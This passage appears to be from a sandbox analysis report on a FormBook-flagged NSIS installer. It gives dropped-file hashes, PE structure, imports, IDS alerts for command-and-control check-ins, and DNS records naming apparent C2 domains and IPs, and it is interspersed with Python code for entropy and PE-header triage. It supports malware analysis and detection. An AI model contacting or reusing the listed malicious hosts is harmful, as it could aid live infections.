                                                                            Preview: ..,......\....e..T/b..."f...&{...q=....}]lw2..k^..xt..9v~6)N.._......u..W.M.........[<2.".J..J...@.T..&....Z..Q.....NF..Q.&.|.8z?..........|.3.....U.I{FD.m*......<F...Ge.....E....'1...D7..l.{.O4..T.]....B.d1.J..'u..nh...`MP..b....B.7.E.o..q?....;.. ...X7.!.z}m%..~@........\..?G..s......B.Y._.(s7J@..q.B.I0.....b;.......{<...9sR......,...:.m....U.d.L..FQ....t/.!lxX....\Hw....)w..B..?.+h.l........1.R.i..DBB.pz.^"......g.,.hE.....{..."...a..[6{......Y.?:....{.vZ ...9...$....t>....u..I.t.&.I.......G\(...q..{...:}....T........._.$...6..........6"&......0;....c._+.....-.,......T&...G..c...t.:j.(e.......r.u}...%D...h...?rB.N%?.....u....._Z....9.x...,..N:+>...H.C..,#.L...mUM...e..^.r.....&..2.b!. .h....W.+...<v.X.*./bz...b.....70....P._...x.\.. ....`.....E.|...p+......T.. .~<.\/s.....N8:...2...2:c...j(..:.Q"...O..@..r.pn.~....f<.$}..z..Esl....}:]....MS..3.....U*e,.~..1.(.59..L...W.....B>l........V...&..n+.8...z.....A./....W..E.....O.......]....V.I...N..`'..h
                                                                            C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll
                                                                            Process: C:\Users\user\Desktop\NdBLyH2h5d.exe
                                                                            File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category: dropped
                                                                            Size (bytes): 5632
                                                                            Entropy (8bit): 4.076385816391399
                                                                            Encrypted: false
                                                                            SSDEEP: 48:a97y+GI2M5gcWZhfChEsHIGmEsH/Gt4BKiZ/seNkTHfav6yYZmEeSRuqSiMy:1QOj4IGN4/GCBKxfQKuixv
                                                                            MD5: C9336787DFDAFEB728B854D5B0137027
                                                                            SHA1: DF3AD91DA915FD81FDA8238B49DA7F8428CD68F9
                                                                            SHA-256: 2FD494E3A53E62F5E4658D2DDD0AE20647933F7ACB0CC0E7DC834CA128AB6D7F
                                                                            SHA-512: 68683812E8B0BF21295C9B475B4A4D2207ADA6A1994E8409005B2B27668889D042E8D718E3DCC73D316316736888C7E93B101CA502A3B4B977136D16328431EB
                                                                            Malicious: false
                                                                            Reputation: low
                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........5K..fK..fK..f_..gZ..fK..fw..f...gJ..f...gJ..f..{fJ..f...gJ..fRichK..f........................PE..L....s`...........!......................... ...............................`............@.........................@ ..P....1.......@.......................P...... ...............................................0...............................code... ........................... ....data...l.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Temp\ur15t24pnyduhs
                                                                            Process: C:\Users\user\Desktop\NdBLyH2h5d.exe
                                                                            File Type: data
                                                                            Category: dropped
                                                                            Size (bytes): 6661
                                                                            Entropy (8bit): 7.961933784328945
                                                                            Encrypted: false
                                                                            SSDEEP: 192:AwW3PWDSp3fuLJLNdsgASFuwS+h0F5xlkeKHP:3tO6Tr4wSc0F5XkfP
                                                                            MD5: 52F75799779AB035150433B39CE1013C
                                                                            SHA1: 7845564CC833DF8A37F6B1603481F036C23EB633
                                                                            SHA-256: 9CD94A2C53E7C3CA35926F96E1F45833C6841E4AF5335B65A5E16D504A074AB6
                                                                            SHA-512: 6D58364D5D9949427D7C66A38BB9840576E2446D30E74B4C19C42A95A14C9B45DDB474257E4D00D43BA2EDD6F69A341EB2AE11ACDE558877F898B6CB8C505521
                                                                            Malicious: false
                                                                            Reputation: low
                                                                            Preview: .u*...kf..w`.L.b.P..^2vB:[..?..I...&..o...:.^|Z.mE.ze.lN.x.M.+...@.....$s.....In.~*..p.e.'a..........|.0e....AT.0...vQ.....?.(Ij&i...p.e..q..K.....K).]...3..T.....bA...!.K.P..J..f+..f.&H.....)....v...j..A.*.M..........T\.e8..}..}B.$....i.B.d.}.Q...U7.5.D9....s.....]..C.n......r..'..A....gD...5.^.O..W}..g}p.2n..B.(p=..9...V.k..;a...Z.{\.....BI[:.S..i..T....X.>c._....:.Z.6..'.y.)%&Gd...Y.Lo.v..z..c.......E....7....J.dJ.[.fy.......(8A....+..L.....2&O..c.|U.r8...-..u hX/9h._ i..8't...m,~.....^q....r.-?......5%.../`6..C...T-l.....Z$..E...T.lOQ6.+$.B..V..3-U....q..X..R..-;S.Be..p.hP{..+.r...N2T..;.R6....`.3.~...(IG...tVx1[......Dec.W.-L...Cv"......_.bA/...5..X..w.K.....9/K.i$=.o-8A..;..!..b1s.3H.w$..{.^h........d.kv.Mz+.N^.u..5.7.X_.....r.A+...B.....:[..?....$C.&vw0.j5......d.........2..z..WZ..n...._yF<...n..+.S.Ce...I.{\.6.....{Z..h_.}C[X..g-.Q0!....D.Ij...(G.z.d.q.....}.B8..Lo....3[.V.>..$L...TW..2.I.7y......F....T.z.....x......Q..3.du..*.)..
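The Entropy and Encrypted columns are what separate the two opaque blobs above from the small DLL. As an added example, not code from the sandbox, the block below computes the same 8-bit Shannon entropy and applies a cut-off for an "encrypted" verdict; the cut-off value (7.99) is an assumption, since the report's own threshold is not stated on the page. The inputs are constructed inside the block: a text-heavy PE-like stub, and two pseudo-random blobs of 6661 and 164864 bytes, the sizes of the two dropped data files.

```python
import math
import random
from collections import Counter
from typing import Dict, Tuple


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant stream, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    counts = Counter(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


# Assumed cut-off for illustration; the sandbox's own threshold is not published on the page.
ENCRYPTED_THRESHOLD = 7.99


def looks_encrypted(data: bytes, threshold: float = ENCRYPTED_THRESHOLD) -> bool:
    """Mirror of the report's Encrypted column: True when the byte distribution is close to uniform."""
    return shannon_entropy(data) >= threshold


def triage(files: Dict[str, bytes]) -> Dict[str, Tuple[float, bool]]:
    """Return {name: (entropy rounded to 4 places, encrypted verdict)} for a set of dropped files."""
    return {name: (round(shannon_entropy(blob), 4), looks_encrypted(blob)) for name, blob in files.items()}


# Constructed inputs (deterministic seed so the numbers are reproducible).
_rng = random.Random(0x385309)
SAMPLE_FILES: Dict[str, bytes] = {
    # text-dominated content, like the dropped 5632-byte DLL (entropy about 4)
    "stub.dll": b"MZ" + b"\0" * 62 + b"This program cannot be run in DOS mode." * 40,
    # uniformly random bytes, sized like ur15t24pnyduhs (6661 bytes)
    "small.bin": bytes(_rng.getrandbits(8) for _ in range(6661)),
    # uniformly random bytes, sized like kujd8v16w3b9lgr (164864 bytes)
    "payload.bin": bytes(_rng.getrandbits(8) for _ in range(164864)),
}

if __name__ == "__main__":
    for name, (entropy, encrypted) in triage(SAMPLE_FILES).items():
        print(f"{name:12s} entropy={entropy:.4f} encrypted={encrypted}")
```

A uniformly random 164864-byte blob measures about 7.999 and a 6661-byte one about 7.97, which is exactly the neighbourhood of the two dropped files: the estimate is biased downward by roughly 255/(2·n·ln 2), so a short blob never reaches the cut-off even when it is pure ciphertext. Entropy therefore separates opaque from structured content but not encrypted from compressed; the flag is a pointer to find the routine that consumes kujd8v16w3b9lgr, not a verdict by itself.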

                                                                            Static File Info

                                                                            General

                                                                            File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Entropy (8bit): 7.904825034789928
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                            • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name: NdBLyH2h5d.exe
                                                                            File size: 207111 bytes
                                                                            MD5: 3fef6985af0d52ab6701df170096b504
                                                                            SHA1: ac8db3220c960262f8e666eae676066cec541b3a
                                                                            SHA256: a9c3d37d324e9b6a0ebf9f9369c68cc288117edc4657d086b0fbc0cbafee9e64
                                                                            SHA512: e2cfc5465a281dbe65152d21e6a1250559e042c59eb8c313a4cae8c4846fb5e998f83d74e97122ba01c63dd10c052a1c6137c85dfe6f6abd9f7894d8811319c4
                                                                            SSDEEP: 3072:HyewmN4skJ6VtZmtsl0UDwDZ6jnJ+vmebKkjgiuK5svdujBO1niLCA0RvNbBorAC:HddmedJjkvxKvMCA0TirvG6t
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                                                            File Icon

                                                                            Icon Hash:b2a88c96b2ca6a72

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint: 0x40314a
                                                                            Entrypoint Section: .text
                                                                            Digitally signed: false
                                                                            Imagebase: 0x400000
                                                                            Subsystem: windows gui
                                                                            Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                            DLL Characteristics: (none)
                                                                            Time Stamp: 0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                                                            TLS Callbacks: (none)
                                                                            CLR (.Net) Version: (none)
                                                                            OS Version Major: 4
                                                                            OS Version Minor: 0
                                                                            File Version Major: 4
                                                                            File Version Minor: 0
                                                                            Subsystem Version Major: 4
                                                                            Subsystem Version Minor: 0
                                                                            Import Hash: 18bc6fa81e19f21156316b1ae696ed6b

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            sub esp, 0000017Ch
                                                                            push ebx
                                                                            push ebp
                                                                            push esi
                                                                            xor esi, esi
                                                                            push edi
                                                                            mov dword ptr [esp+18h], esi
                                                                            mov ebp, 00409240h
                                                                            mov byte ptr [esp+10h], 00000020h
                                                                            call dword ptr [00407030h]
                                                                            push esi
                                                                            call dword ptr [00407270h]
                                                                            mov dword ptr [007A3030h], eax
                                                                            push esi
                                                                            lea eax, dword ptr [esp+30h]
                                                                            push 00000160h
                                                                            push eax
                                                                            push esi
                                                                            push 0079E540h
                                                                            call dword ptr [00407158h]
                                                                            push 00409230h
                                                                            push 007A2780h
                                                                            call 00007FF688C03BD8h
                                                                            mov ebx, 007AA400h
                                                                            push ebx
                                                                            push 00000400h
                                                                            call dword ptr [004070B4h]
                                                                            call 00007FF688C01319h
                                                                            test eax, eax
                                                                            jne 00007FF688C013D6h
                                                                            push 000003FBh
                                                                            push ebx
                                                                            call dword ptr [004070B0h]
                                                                            push 00409228h
                                                                            push ebx
                                                                            call 00007FF688C03BC3h
                                                                            call 00007FF688C012F9h
                                                                            test eax, eax
                                                                            je 00007FF688C014F2h
                                                                            mov edi, 007A9000h
                                                                            push edi
                                                                            call dword ptr [00407140h]
                                                                            call dword ptr [004070ACh]
                                                                            push eax
                                                                            push edi
                                                                            call 00007FF688C03B81h
                                                                            push 00000000h
                                                                            call dword ptr [00407108h]
                                                                            cmp byte ptr [007A9000h], 00000022h
                                                                            mov dword ptr [007A2F80h], eax
                                                                            mov eax, edi
                                                                            jne 00007FF688C013BCh
                                                                            mov byte ptr [esp+10h], 00000022h
                                                                            mov eax, 00000001h

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                            Data Directories

                                                                            Name | Virtual Address | Virtual Size | Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | (not present)
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7344 | 0xb4 | .rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3ac000 | 0x900 | .rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | (not present)
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | (not present)
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | (not present)
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | (not present)
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | (not present)
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | (not present)
                                                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | (not present)
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | (not present)
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | (not present)
                                                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | (not present)
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | (not present)
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | (not present)

                                                                            Sections

                                                                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                            .text | 0x1000 | 0x59de | 0x5a00 | False | 0.681293402778 | data | 6.5143386598 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .rdata | 0x7000 | 0x10f2 | 0x1200 | False | 0.430338541667 | data | 5.0554281206 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data | 0x9000 | 0x39a034 | 0x400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                            .ndata | 0x3a4000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .rsrc | 0x3ac000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94574916515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
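The General and Sections tables above are the raw material for the first static checks an analyst runs on a sample: where the entry point lands, whether the image can be relocated, and whether any section's in-memory size is out of proportion to what is on disk. The following is an added example, not code from the sandbox or from the NSIS project: it builds a PE32 header in memory from the values printed in this report (entry point 0x314a, image base 0x400000, timestamp 0x4538CD0B, the five sections with their characteristics) and parses it back with a minimal header reader. The raw-data file offsets, the linker version and the stack/heap sizes are assumed because the report does not print them, and the 16x virtual-to-raw ratio used as an anomaly threshold is an arbitrary choice.

```python
import struct
from datetime import datetime, timezone

# Section characteristic bits from the PE/COFF spec, named as the report prints them.
SCN_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}
# File header characteristic bits (the subset relevant to this sample plus DLL).
FILE_FLAGS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0100: "32BIT_MACHINE", 0x2000: "DLL",
}


def decode_flags(value, table):
    return [name for bit, name in table.items() if value & bit]


# (name, virtual address, virtual size, raw size, characteristics) copied from the Sections table.
SAMPLE_SECTIONS = [
    (".text",  0x1000,   0x59de,   0x5a00, 0x60000020),
    (".rdata", 0x7000,   0x10f2,   0x1200, 0x40000040),
    (".data",  0x9000,   0x39a034, 0x400,  0xC0000040),
    (".ndata", 0x3a4000, 0x8000,   0x0,    0xC0000080),
    (".rsrc",  0x3ac000, 0x900,    0xa00,  0x40000040),
]


def build_sample_pe_headers(sections=SAMPLE_SECTIONS):
    """Constructed PE32 headers (no section bodies) carrying the report's header values."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                 # e_lfanew: PE header follows the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x4538CD0B, 0, 0, 224, 0x010F)
    opt = struct.pack(
        "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
        0x10B, 6, 0,                          # PE32 magic, linker version (assumed)
        0x5a00, 0x1c00, 0x8000,               # SizeOfCode, SizeOfInitializedData, SizeOfUninitializedData
        0x314a, 0x1000, 0x7000,               # AddressOfEntryPoint, BaseOfCode, BaseOfData
        0x400000, 0x1000, 0x200,              # ImageBase, SectionAlignment, FileAlignment
        4, 0, 0, 0, 4, 0,                     # OS / image / subsystem versions as reported
        0, 0x3ad000, 0x400, 0,                # Win32VersionValue, SizeOfImage, SizeOfHeaders, CheckSum
        2, 0,                                 # Subsystem = WINDOWS_GUI, DllCharacteristics = none
        0x100000, 0x1000, 0x100000, 0x1000, 0, 16,   # stack/heap sizes (assumed), LoaderFlags, 16 directories
    ) + b"\0" * 128                           # 16 empty data directory entries
    raw_ptr, table = 0x400, b""               # file offsets are assumed, laid out back to back
    for name, va, vsize, rawsize, chars in sections:
        ptr = raw_ptr if rawsize else 0
        table += struct.pack("<8sIIIIIIHHI", name.encode(), vsize, va, rawsize, ptr, 0, 0, 0, 0, chars)
        raw_ptr += rawsize
    return bytes(dos) + b"PE\0\0" + coff + opt + table


def parse_pe(data):
    """Minimal PE32 reader: entry point, image base, timestamp, file flags, subsystem, section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _machine, nsec, ts, _, _, opt_size, file_chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "va": va,
                         "vsize": vsize, "raw_size": rawsize, "raw_ptr": rawptr, "chars": chars})
    return {
        "entry_point": entry, "image_base": image_base, "entry_point_va": image_base + entry,
        "timestamp": datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "file_flags": decode_flags(file_chars, FILE_FLAGS), "subsystem": subsystem,
        "dll_characteristics": dll_chars, "sections": sections,
    }


def section_for_rva(pe, rva):
    """Return the section containing an RVA (entry point, resource RVA, ...), or None."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s
    return None


def suspicious_sections(pe, ratio=16):
    """Flag W+X sections and sections whose in-memory size dwarfs their on-disk size (ratio is assumed)."""
    findings = []
    for s in pe["sections"]:
        if s["chars"] & 0x80000000 and s["chars"] & 0x20000000:
            findings.append((s["name"], "writable and executable"))
        if s["raw_size"] and s["vsize"] > ratio * s["raw_size"]:
            findings.append((s["name"], "virtual size far exceeds raw size"))
    return findings


if __name__ == "__main__":
    pe = parse_pe(build_sample_pe_headers())
    print(hex(pe["entry_point_va"]), "in", section_for_rva(pe, pe["entry_point"])["name"], pe["timestamp"])
    for s in pe["sections"]:
        print(f'{s["name"]:7s} va={s["va"]:#x} vsize={s["vsize"]:#x} raw={s["raw_size"]:#x}',
              ", ".join(decode_flags(s["chars"], SCN_FLAGS)))
    print(suspicious_sections(pe))
```

Run against the report's values, the reader confirms the entry point 0x40314a sits in .text, recovers the 2006 build timestamp, and flags only .data, whose 0x39a034-byte virtual size is backed by 0x400 bytes on disk. RELOCS_STRIPPED together with an empty DllCharacteristics field means the image carries no relocations and does not opt into ASLR, so it always loads at 0x400000; .ndata is uninitialised data (raw size 0) and is deliberately not flagged.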

                                                                            Resources

                                                                            Name | RVA | Size | Type | Language | Country
                                                                            RT_ICON | 0x3ac190 | 0x2e8 | data | English | United States
                                                                            RT_DIALOG | 0x3ac478 | 0x100 | data | English | United States
                                                                            RT_DIALOG | 0x3ac578 | 0x11c | data | English | United States
                                                                            RT_DIALOG | 0x3ac698 | 0x60 | data | English | United States
                                                                            RT_GROUP_ICON | 0x3ac6f8 | 0x14 | data | English | United States
                                                                            RT_MANIFEST | 0x3ac710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                                            Imports

                                                                            DLL | Imports
                                                                            KERNEL32.dll | CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                            USER32.dll | ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                            GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                            SHELL32.dll | SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                            ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                            COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                            ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance
                                                                            VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                                                                            This import table is that of the NSIS installer stub identified under Static File Info (installer UI, file and registry operations, LoadLibraryA/GetProcAddress for plug-in DLLs such as the dropped 6oxdti6l9qd.dll); the encrypted blobs written to %TEMP% do not contribute to it, so the FormBook payload's own API use is not visible here.

                                                                            Possible Origin

                                                                            Language of compilation system | Country where language is spoken
                                                                            English | United States

                                                                            Network Behavior

                                                                            Snort IDS Alerts

                                                                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                            04/12/21-10:06:12.886360 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49709 | 34.102.136.180 | 192.168.2.3
                                                                            04/12/21-10:06:24.103583 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49713 | 80 | 192.168.2.3 | 52.15.160.167
                                                                            04/12/21-10:06:24.103583 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49713 | 80 | 192.168.2.3 | 52.15.160.167
                                                                            04/12/21-10:06:24.103583 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49713 | 80 | 192.168.2.3 | 52.15.160.167
                                                                            04/12/21-10:06:39.648039 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49718 | 80 | 192.168.2.3 | 213.171.195.105
                                                                            04/12/21-10:06:39.648039 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49718 | 80 | 192.168.2.3 | 213.171.195.105
                                                                            04/12/21-10:06:39.648039 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49718 | 80 | 192.168.2.3 | 213.171.195.105
                                                                            04/12/21-10:06:56.074540 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.3 | 23.227.38.74
                                                                            04/12/21-10:06:56.074540 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.3 | 23.227.38.74
                                                                            04/12/21-10:06:56.074540 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.3 | 23.227.38.74
                                                                            04/12/21-10:06:56.251104 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49725 | 23.227.38.74 | 192.168.2.3
                                                                            04/12/21-10:07:06.602644 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49726 | 185.253.212.22 | 192.168.2.3
                                                                            04/12/21-10:07:23.705914 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49733 | 80 | 192.168.2.3 | 184.168.131.241
                                                                            04/12/21-10:07:23.705914 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49733 | 80 | 192.168.2.3 | 184.168.131.241
                                                                            04/12/21-10:07:23.705914 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49733 | 80 | 192.168.2.3 | 184.168.131.241
                                                                            04/12/21-10:07:34.592023 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49735 | 80 | 192.168.2.3 | 104.21.24.135
                                                                            04/12/21-10:07:34.592023 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49735 | 80 | 192.168.2.3 | 104.21.24.135
                                                                            04/12/21-10:07:34.592023 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49735 | 80 | 192.168.2.3 | 104.21.24.135
                                                                            04/12/21-10:07:39.845866 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49736 | 34.102.136.180 | 192.168.2.3

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 12, 2021 10:06:12.694369078 CEST | 8.8.8.8 | 192.168.2.3 | 0xe041 | No error (0) | www.fibermover.com | fibermover.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:06:12.694369078 CEST | 8.8.8.8 | 192.168.2.3 | 0xe041 | No error (0) | fibermover.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:17.974059105 CEST | 8.8.8.8 | 192.168.2.3 | 0xb7ac | No error (0) | www.mojilifenoosa.com | mojilifenoosa.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:06:17.974059105 CEST | 8.8.8.8 | 192.168.2.3 | 0xb7ac | No error (0) | mojilifenoosa.com |  | 184.168.131.241 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:23.935321093 CEST | 8.8.8.8 | 192.168.2.3 | 0x8bd | No error (0) | www.7chd.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:06:23.935321093 CEST | 8.8.8.8 | 192.168.2.3 | 0x8bd | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 52.15.160.167 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:23.935321093 CEST | 8.8.8.8 | 192.168.2.3 | 0x8bd | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.14.206.30 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:23.935321093 CEST | 8.8.8.8 | 192.168.2.3 | 0x8bd | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.13.255.157 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:29.378269911 CEST | 8.8.8.8 | 192.168.2.3 | 0x4b0 | Name error (3) | www.bl927.com | none | none | A (IP address) | IN (0x0001)
